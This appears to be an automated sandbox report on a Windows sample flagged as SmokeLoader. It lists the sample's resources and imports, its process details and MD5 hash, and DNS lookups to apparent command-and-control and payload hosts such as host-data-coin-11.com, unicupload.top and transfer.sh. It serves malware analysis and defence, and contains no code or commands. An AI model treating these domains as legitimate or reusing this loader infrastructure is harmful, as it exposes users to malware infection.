RT_ICON | 0x152418 | 0x988 | dBase III DBT, version number 0, next free block index 40 | Assamese | India
RT_ICON | 0x152da0 | 0x468 | GLS_BINARY_LSB_FIRST | Assamese | India
RT_ICON | 0x153258 | 0x8a8 | data | Assamese | India
RT_ICON | 0x153b00 | 0x6c8 | data | Assamese | India
RT_ICON | 0x1541c8 | 0x568 | GLS_BINARY_LSB_FIRST | Assamese | India
RT_ICON | 0x154730 | 0x10a8 | data | Assamese | India
RT_ICON | 0x1557d8 | 0x988 | data | Assamese | India
RT_ICON | 0x156160 | 0x468 | GLS_BINARY_LSB_FIRST | Assamese | India
RT_STRING | 0x157920 | 0xe4 | data | Dutch | Netherlands
RT_STRING | 0x157a08 | 0x3bc | data | Dutch | Netherlands
RT_STRING | 0x157dc8 | 0x6e6 | data | Dutch | Netherlands
RT_STRING | 0x1584b0 | 0x1a0 | data | Dutch | Netherlands
RT_STRING | 0x158650 | 0xd8 | data | Dutch | Netherlands
RT_ACCELERATOR | 0x157000 | 0x10 | data | Dutch | Netherlands
RT_ACCELERATOR | 0x156ff0 | 0x10 | data | Dutch | Netherlands
RT_GROUP_CURSOR | 0x157908 | 0x14 | data | Dutch | Netherlands
RT_GROUP_ICON | 0x153208 | 0x4c | data | Assamese | India
RT_GROUP_ICON | 0x1565c8 | 0x5a | data | Assamese | India
None | 0x157020 | 0xa | data | Dutch | Netherlands
None | 0x157030 | 0xa | data | Dutch | Netherlands
None | 0x157010 | 0xa | data | Dutch | Netherlands

                                                                                                        Imports

DLL | Import
KERNEL32.dll | DeactivateActCtx, GetVersionExW, SetConsoleCP, GetConsoleAliasesLengthA, GetDefaultCommConfigA, FindFirstFileExW, GetDriveTypeA, FreeEnvironmentStringsA, SetProcessPriorityBoost, SetVolumeMountPointW, GetLongPathNameW, CopyFileA, TlsGetValue, GetConsoleCursorInfo, SetComputerNameExA, SystemTimeToTzSpecificLocalTime, FindAtomA, ReleaseSemaphore, CallNamedPipeA, CreateMailslotA, BuildCommDCBAndTimeoutsW, VirtualProtect, LoadLibraryA, LocalAlloc, TryEnterCriticalSection, GetCommandLineW, InterlockedDecrement, GetCalendarInfoA, DeleteFileA, CreateActCtxW, CreateRemoteThread, SetSystemTimeAdjustment, SetPriorityClass, WritePrivateProfileStringW, GetProcessHeap, GlobalUnWire, ReadConsoleOutputCharacterW, GetStartupInfoW, GetDiskFreeSpaceExA, GetCPInfoExA, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetLastError, GetProfileStringW, WriteProfileSectionW, GetProfileStringA, SetLastError, DeleteVolumeMountPointA, DebugBreak, lstrcmpA, ReadFileScatter, SetConsoleMode, GetVersion, GetSystemWindowsDirectoryW, GlobalFindAtomA, FindCloseChangeNotification, GetTapeParameters, SetMailslotInfo, InterlockedExchange, DefineDosDeviceW, FindVolumeMountPointClose, EndUpdateResourceA, WriteConsoleA, GetSystemTimeAdjustment, WritePrivateProfileSectionA, GetPrivateProfileStructW, GetFileAttributesExA, MoveFileW, GetVolumePathNameA, HeapUnlock, lstrcmpW, SetDefaultCommConfigW, GetExitCodeProcess, ResetEvent, GetThreadContext, MoveFileExW, GetProcAddress, GlobalLock, UnregisterWaitEx, BuildCommDCBW, PeekConsoleInputW, GetBinaryTypeW, CreateSemaphoreW, TransmitCommChar, WaitNamedPipeA, GetOverlappedResult, GetPrivateProfileSectionNamesW, FindResourceExW, EnumTimeFormatsW, GetLocalTime, CreateSemaphoreA, FreeEnvironmentStringsW, GetPrivateProfileSectionW, SetFileShortNameA, lstrcpyA, VerLanguageNameW, SetThreadExecutionState, SetSystemTime, LockFile, VerSetConditionMask, GetConsoleAliasA, FlushConsoleInputBuffer, FreeConsole, GetAtomNameW, GetConsoleAliasExesLengthA, WriteConsoleInputW, TransactNamedPipe, EnumDateFormatsA, SetCommState, FileTimeToLocalFileTime, _lopen, GetConsoleAliasExesLengthW, GetWriteWatch, GetModuleHandleW, WriteConsoleOutputCharacterA, GetConsoleMode, HeapFree, OpenMutexA, LocalLock, GetCommMask, SetEndOfFile, FindClose, CreateIoCompletionPort, SetFileApisToANSI, CancelWaitableTimer, GetProcessHandleCount, UnregisterWait, GetConsoleAliasesLengthW, GetCurrentProcessId, lstrcpynA, SetNamedPipeHandleState, GetCompressedFileSizeA, FindNextVolumeMountPointW, GetFullPathNameA, WriteProfileStringA, DeleteAtom, GlobalAddAtomW, AssignProcessToJobObject, QueryDosDeviceW, InitializeCriticalSection, Process32NextW, SetCurrentDirectoryA, GetBinaryTypeA, FindActCtxSectionGuid, TerminateProcess, MoveFileA, RaiseException, HeapValidate, IsBadReadPtr, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, GetModuleHandleA, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, InterlockedIncrement, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, Sleep, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetEnvironmentStringsW, HeapDestroy, HeapCreate, VirtualFree, GetModuleFileNameA, WriteFile, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, RtlUnwind, InitializeCriticalSectionAndSpinCount, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, LoadLibraryW, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, WideCharToMultiByte, LCMapStringA, LCMapStringW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, FlushFileBuffers, SetStdHandle, GetConsoleOutputCP, CloseHandle, CreateFileA
USER32.dll | OemToCharA
ADVAPI32.dll | GetFileSecurityA

Possible Origin

Language of compilation system | Country where language is spoken
Dutch | Netherlands
Assamese | India

Network Behavior

Network Port Distribution

TCP Packets


DNS Queries

                                                                                                        Jan 14, 2022 20:23:59.081888914 CET192.168.2.38.8.8.80x8015Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:59.302086115 CET192.168.2.38.8.8.80xbb59Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:01.871258974 CET192.168.2.38.8.8.80xf250Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:02.044727087 CET192.168.2.38.8.8.80x69ffStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:02.216252089 CET192.168.2.38.8.8.80xd2ddStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:03.665247917 CET192.168.2.38.8.8.80x50d1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:04.127317905 CET192.168.2.38.8.8.80xc30fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:04.312788963 CET192.168.2.38.8.8.80xe4e8Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:06.022989988 CET192.168.2.38.8.8.80x71d6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:06.312561035 CET192.168.2.38.8.8.80x4ae7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:14.684118032 CET192.168.2.38.8.8.80x4fd3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:14.937835932 CET192.168.2.38.8.8.80x8837Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:15.105503082 CET192.168.2.38.8.8.80x3864Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:17.843784094 CET192.168.2.38.8.8.80x91d5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:18.013364077 CET192.168.2.38.8.8.80x872fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:18.182811975 CET192.168.2.38.8.8.80xb763Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:18.355863094 CET192.168.2.38.8.8.80xb072Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:18.527890921 CET192.168.2.38.8.8.80x634aStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:21.727242947 CET192.168.2.38.8.8.80xb1d4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:21.889111042 CET192.168.2.38.8.8.80x293aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:22.071381092 CET192.168.2.38.8.8.80x6ba6Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:24.095540047 CET192.168.2.38.8.8.80xac86Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:25.046252012 CET192.168.2.38.8.8.80x2983Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:25.351382017 CET192.168.2.38.8.8.80xe2abStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:31.004300117 CET192.168.2.38.8.8.80xf809Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:36.338799953 CET192.168.2.38.8.8.80xe4e6Standard query (0)transfer.shA (IP address)IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 14, 2022 20:22:59.911616087 CET | 8.8.8.8 | 192.168.2.3 | 0xdb2a | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:00.403337955 CET | 8.8.8.8 | 192.168.2.3 | 0xb64c | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:00.572498083 CET | 8.8.8.8 | 192.168.2.3 | 0xd5c3 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:01.048615932 CET | 8.8.8.8 | 192.168.2.3 | 0x5141 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:01.244103909 CET | 8.8.8.8 | 192.168.2.3 | 0xe843 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:01.748825073 CET | 8.8.8.8 | 192.168.2.3 | 0x2ea4 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:03.391123056 CET | 8.8.8.8 | 192.168.2.3 | 0x97a | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:03.856426954 CET | 8.8.8.8 | 192.168.2.3 | 0x3215 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:04.293950081 CET | 8.8.8.8 | 192.168.2.3 | 0x1642 | No error (0) | data-host-coin-8.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:05.792773008 CET | 8.8.8.8 | 192.168.2.3 | 0xc79c | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:05.980930090 CET | 8.8.8.8 | 192.168.2.3 | 0xfb5a | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:06.433780909 CET | 8.8.8.8 | 192.168.2.3 | 0x1527 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:06.758944035 CET | 8.8.8.8 | 192.168.2.3 | 0x5108 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:07.238167048 CET | 8.8.8.8 | 192.168.2.3 | 0xc95b | No error (0) | privacy-tools-for-you-780.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:08.870402098 CET | 8.8.8.8 | 192.168.2.3 | 0x908b | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:09.045989990 CET | 8.8.8.8 | 192.168.2.3 | 0x2c44 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:09.228575945 CET | 8.8.8.8 | 192.168.2.3 | 0x7051 | No error (0) | unicupload.top |  | 54.38.220.85 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:09.296737909 CET | 8.8.8.8 | 192.168.2.3 | 0xac5c | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:09.503681898 CET | 8.8.8.8 | 192.168.2.3 | 0xe140 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:10.105284929 CET | 8.8.8.8 | 192.168.2.3 | 0x9e93 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:10.308665991 CET | 8.8.8.8 | 192.168.2.3 | 0xbfa0 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:10.785981894 CET | 8.8.8.8 | 192.168.2.3 | 0xc084 | No error (0) | data-host-coin-8.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:13.894783020 CET | 8.8.8.8 | 192.168.2.3 | 0x4e00 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:14.072632074 CET | 8.8.8.8 | 192.168.2.3 | 0x5d57 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:14.249980927 CET | 8.8.8.8 | 192.168.2.3 | 0x2c7d | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:14.448292971 CET | 8.8.8.8 | 192.168.2.3 | 0xda0e | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:17.133790970 CET | 8.8.8.8 | 192.168.2.3 | 0xe276 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:17.569967985 CET | 8.8.8.8 | 192.168.2.3 | 0x1741 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:17.747776031 CET | 8.8.8.8 | 192.168.2.3 | 0x1230 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:17.920452118 CET | 8.8.8.8 | 192.168.2.3 | 0xdf88 | No error (0) | cdn.discordapp.com |  | 162.159.129.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:17.920452118 CET | 8.8.8.8 | 192.168.2.3 | 0xdf88 | No error (0) | cdn.discordapp.com |  | 162.159.135.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:17.920452118 CET | 8.8.8.8 | 192.168.2.3 | 0xdf88 | No error (0) | cdn.discordapp.com |  | 162.159.134.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:17.920452118 CET | 8.8.8.8 | 192.168.2.3 | 0xdf88 | No error (0) | cdn.discordapp.com |  | 162.159.130.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:17.920452118 CET | 8.8.8.8 | 192.168.2.3 | 0xdf88 | No error (0) | cdn.discordapp.com |  | 162.159.133.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:19.778841972 CET | 8.8.8.8 | 192.168.2.3 | 0xfd1 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:19.951246977 CET | 8.8.8.8 | 192.168.2.3 | 0x62c5 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:20.142239094 CET | 8.8.8.8 | 192.168.2.3 | 0xb96f | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:41.639306068 CET | 8.8.8.8 | 192.168.2.3 | 0x77df | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:41.836302996 CET | 8.8.8.8 | 192.168.2.3 | 0x2e1a | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:42.013575077 CET | 8.8.8.8 | 192.168.2.3 | 0xc72f | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:42.180665016 CET | 8.8.8.8 | 192.168.2.3 | 0x2d01 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:42.362310886 CET | 8.8.8.8 | 192.168.2.3 | 0xb2c1 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:42.536467075 CET | 8.8.8.8 | 192.168.2.3 | 0x4563 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:42.703030109 CET | 8.8.8.8 | 192.168.2.3 | 0xff7a | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:42.891748905 CET | 8.8.8.8 | 192.168.2.3 | 0xefc8 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:43.085407019 CET | 8.8.8.8 | 192.168.2.3 | 0x8ed9 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:43.280286074 CET | 8.8.8.8 | 192.168.2.3 | 0x12b6 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:43.467264891 CET | 8.8.8.8 | 192.168.2.3 | 0xcee | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:43.642393112 CET | 8.8.8.8 | 192.168.2.3 | 0x53c2 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:43.809518099 CET | 8.8.8.8 | 192.168.2.3 | 0xb3a0 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:44.295824051 CET | 8.8.8.8 | 192.168.2.3 | 0x20de | No error (0) | data-host-coin-8.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:45.748609066 CET | 8.8.8.8 | 192.168.2.3 | 0x8df9 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:45.948498964 CET | 8.8.8.8 | 192.168.2.3 | 0x4292 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:46.127774000 CET | 8.8.8.8 | 192.168.2.3 | 0x7729 | No error (0) | goo.su |  | 104.21.38.221 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:46.127774000 CET | 8.8.8.8 | 192.168.2.3 | 0x7729 | No error (0) | goo.su |  | 172.67.139.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:46.803097963 CET | 8.8.8.8 | 192.168.2.3 | 0xcc15 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:47.014014006 CET | 8.8.8.8 | 192.168.2.3 | 0xd21d | No error (0) | transfer.sh |  | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:47.980468988 CET | 8.8.8.8 | 192.168.2.3 | 0x59e0 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:49.133007050 CET | 8.8.8.8 | 192.168.2.3 | 0xbdcf | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:49.313539028 CET | 8.8.8.8 | 192.168.2.3 | 0x6782 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:49.482646942 CET | 8.8.8.8 | 192.168.2.3 | 0x55b3 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:49.654067993 CET | 8.8.8.8 | 192.168.2.3 | 0x603d | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:57.160844088 CET | 8.8.8.8 | 192.168.2.3 | 0x29e | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:57.332928896 CET | 8.8.8.8 | 192.168.2.3 | 0x512a | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:58.744246006 CET | 8.8.8.8 | 192.168.2.3 | 0xe13b | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:58.920618057 CET | 8.8.8.8 | 192.168.2.3 | 0x1574 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:59.098858118 CET | 8.8.8.8 | 192.168.2.3 | 0x8015 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:23:59.322348118 CET | 8.8.8.8 | 192.168.2.3 | 0xbb59 | No error (0) | transfer.sh |  | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:01.890768051 CET | 8.8.8.8 | 192.168.2.3 | 0xf250 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:02.064228058 CET | 8.8.8.8 | 192.168.2.3 | 0x69ff | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:02.234983921 CET | 8.8.8.8 | 192.168.2.3 | 0xd2dd | No error (0) | data-host-coin-8.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:03.976593971 CET | 8.8.8.8 | 192.168.2.3 | 0x50d1 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:04.148250103 CET | 8.8.8.8 | 192.168.2.3 | 0xc30f | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:04.332371950 CET | 8.8.8.8 | 192.168.2.3 | 0xe4e8 | No error (0) | data-host-coin-8.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:06.042289019 CET | 8.8.8.8 | 192.168.2.3 | 0x71d6 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:06.331660986 CET | 8.8.8.8 | 192.168.2.3 | 0x4ae7 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:14.704119921 CET | 8.8.8.8 | 192.168.2.3 | 0x4fd3 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:14.957201004 CET | 8.8.8.8 | 192.168.2.3 | 0x8837 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:15.122947931 CET | 8.8.8.8 | 192.168.2.3 | 0x3864 | No error (0) | transfer.sh |  | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:17.861490965 CET | 8.8.8.8 | 192.168.2.3 | 0x91d5 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:18.030811071 CET | 8.8.8.8 | 192.168.2.3 | 0x872f | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:18.202325106 CET | 8.8.8.8 | 192.168.2.3 | 0xb763 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:18.373193026 CET | 8.8.8.8 | 192.168.2.3 | 0xb072 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:18.547805071 CET | 8.8.8.8 | 192.168.2.3 | 0x634a | No error (0) | transfer.sh |  | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:21.744167089 CET | 8.8.8.8 | 192.168.2.3 | 0xb1d4 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:21.906145096 CET | 8.8.8.8 | 192.168.2.3 | 0x293a | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:22.090316057 CET | 8.8.8.8 | 192.168.2.3 | 0x6ba6 | No error (0) | transfer.sh |  | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:24.114954948 CET | 8.8.8.8 | 192.168.2.3 | 0xac86 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:25.066088915 CET | 8.8.8.8 | 192.168.2.3 | 0x2983 | No error (0) | host-data-coin-11.com |  | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:25.371095896 CET | 8.8.8.8 | 192.168.2.3 | 0xe2ab | No error (0) | transfer.sh |  | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:31.025305033 CET | 8.8.8.8 | 192.168.2.3 | 0xf809 | No error (0) | cdn.discordapp.com |  | 162.159.129.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:31.025305033 CET | 8.8.8.8 | 192.168.2.3 | 0xf809 | No error (0) | cdn.discordapp.com |  | 162.159.135.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:31.025305033 CET | 8.8.8.8 | 192.168.2.3 | 0xf809 | No error (0) | cdn.discordapp.com |  | 162.159.130.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:31.025305033 CET | 8.8.8.8 | 192.168.2.3 | 0xf809 | No error (0) | cdn.discordapp.com |  | 162.159.134.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:31.025305033 CET | 8.8.8.8 | 192.168.2.3 | 0xf809 | No error (0) | cdn.discordapp.com |  | 162.159.133.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 20:24:36.358298063 CET | 8.8.8.8 | 192.168.2.3 | 0xe4e6 | No error (0) | transfer.sh |  | 144.76.136.153 | A (IP address) | IN (0x0001)

                                                                                                        HTTP Request Dependency Graph

                                                                                                        Code Manipulations

                                                                                                        Statistics

                                                                                                        Behavior

                                                                                                        System Behavior

                                                                                                        General

                                                                                                         Start time: 20:22:18
                                                                                                         Start date: 14/01/2022
                                                                                                         Path: C:\Users\user\Desktop\ZA3cYU28Yl.exe
                                                                                                         Wow64 process (32bit): true
                                                                                                         Commandline: "C:\Users\user\Desktop\ZA3cYU28Yl.exe"
                                                                                                         Imagebase: 0x400000
                                                                                                         File size: 320000 bytes
                                                                                                         MD5 hash: 679831CF1F00950B4ADFFBBBA7E6AB46
                                                                                                         Has elevated privileges: true
                                                                                                         Has administrator privileges: true
                                                                                                         Programmed in: C, C++ or other language
                                                                                                         Reputation: low

                                                                                                        General

                                                                                                         Start time: 20:22:19
                                                                                                         Start date: 14/01/2022
                                                                                                         Path: C:\Users\user\Desktop\ZA3cYU28Yl.exe
                                                                                                         Wow64 process (32bit): true
                                                                                                         Commandline: "C:\Users\user\Desktop\ZA3cYU28Yl.exe"
                                                                                                         Imagebase: 0x400000
                                                                                                         File size: 320000 bytes
                                                                                                         MD5 hash: 679831CF1F00950B4ADFFBBBA7E6AB46
                                                                                                         Has elevated privileges: true
                                                                                                         Has administrator privileges: true
                                                                                                         Programmed in: C, C++ or other language
                                                                                                         Yara matches:
                                                                                                         • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.333262137.00000000005B1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                         • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.333204148.00000000004A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                         Reputation: low

